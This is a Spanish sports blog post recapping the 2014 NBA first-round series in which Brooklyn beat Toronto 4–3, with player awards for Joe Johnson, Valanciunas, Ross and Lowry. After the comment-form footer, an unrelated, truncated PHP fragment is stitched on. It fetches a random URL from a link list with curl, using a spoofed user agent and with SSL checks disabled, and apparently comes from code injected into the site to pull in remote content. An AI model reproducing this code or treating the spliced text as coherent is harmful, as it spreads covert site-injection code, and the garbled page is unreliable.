PO 2014: Resumen Toronto Raptors 3 – Brooklyn Nets 4

06 de May de 2014 por Simon

Otra serie más que se decidió en el séptimo y definitivo partido pero en este caso el vencedor ha terminado siendo el equipo que jugaba fuera de casa.

La serie empezó muy caliente con Masai Ujiri arengando a los aficionados Raptors con el ya famoso “fuck Brooklyn” que le costó una multa por parte de la liga. Además la jugada le salió mal porque el primer asalto se lo llevaron los visitantes, robando así el factor cancha que no recuperarían hasta el cuarto partido en el que los Raptors consiguieron imponerse en el Barclays Center. El quinto encuentro fue el más loco de toda la serie. Los Raptors llegaron a tener ventajas de casi 30 puntos durante el tercer cuarto pero un gran último periodo de Brooklyn igualó el marcador que finalmente cayó del lado canadiense con mucho sufrimiento en los últimos segundos.  En el sexto los de Jason Kidd solventaron el match ball en contra venciendo claramente a los Raptors y forzaron el séptimo partido en el que un tapón de Pierce sobre Lowry acabó otorgando la clasificación a los Nets.

Los Toronto Raptors han confirmado que a pesar de no tener una super estrella son un bloque muy compacto y con muchos y muy buenos mimbres para hacer un equipo ganador en las próximas temporadas. El gran protagonista de la serie del lado canadiense ha sido Kyle Lowry y es que este equipo vive y muere por él. Tiene muchos defectos pero me recuerda a Westbrook por aquello de que de sus oscuridades muchas veces vienen sus luces. Muy buenos detalles nos ha dejado también en Jonas Valanciunas a pesar de ir de más a menos. El pívot lituano demostró en muchos momentos la enorme calidad que atesora y que en el futuro puede ser un pívot importante de la liga. 

Por su parte, Brooklyn ha pasado una dura prueba en esta primera ronda. Han conseguido eliminar a un equipo que no le venía demasiado bien por la velocidad de los exteriores rivales. Joe Johnson ha demostrado que está en plena forma y que ha llegado en un gran momento a los Play Offs. Más allá de los números la aportación de Paul Pierce y Kevin Garnett a sido vital para su equipo. En un par de partidos estuvieron desaparecidos y fueron los que los Nets perdieron más fácilmente.

Hemos visto una serie preciosa con duelos muy físicos y partidos apretados y un desenlace emocionantísimo en un séptimo partido en el que, como ya intuíamos, la experiencia de los “viejos” Nets iba a terminar imponiéndose ante la bisoñez de los canadienses. Los jugadores de los Raptors han participado en un máster de 7 partidos en el que han aprendido muy bien lo que son los Play Off, experiencia que en el futuro les servirá de mucho. Podríamos pensar que la serie ha dejado tocados a los ganadores de cara a la siguiente ronda debido al fuerte desgaste que han sufrido pero lo cierto es que van a llegar con muchísimo más ritmo que sus rivales a la semifinal de conferencia por lo que puede terminar resultando positivo.

PREMIOS

MVP: Lo ha demostrado. Es el que menos cartel tiene del “Big Four” de los Nets pero es sin duda el mejor jugador actualmente del equipo. “Clutch Player” como pocos y con una clase que se la pisa. Cuando rinde como lo ha hecho en esta primera ronda pocos se acordarán de su supercontrato de cifras astronómicas. Hablamos de Joe Johnson (21.9 ppp).

Sorpresa: Jonas Valanciunas (10.9 ppp – 9.7 rpp – 1 tpp) aunque de manera relativa. Intuíamos que iba a ser un hombre importante en el devenir de las serie pero su rendimiento en los primeros partidos resultaron  una sorpresa agradable.

Decepción: Terrence Ross (5 ppp – 2 rpp). Puede que seamos injustos ya que su rendimiento no estuvo demasiado por debajo de lo habitual en temporada regular pero se echó en falta algo más de implicación por parte del alero en ciertos momentos. El día que se quite la “vergüenza” y se crea lo bueno que es Toronto alcanzará otro nivel.

Esfuerzo en vano: Sin duda Kyle Lowry (21.1 ppp – 4.7 rpp – 4.7 rpp). Como ya hemos comentado sus defectos a veces son su mayor virtud. Nunca deja de intentarlo y se va contra quien haga  falta con tal de lograr su objetivo. A veces esto es contraproducente pero sin duda nadie puede negar que Toronto no estaría aquí sin las locuras del pequeñín de Kyle.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>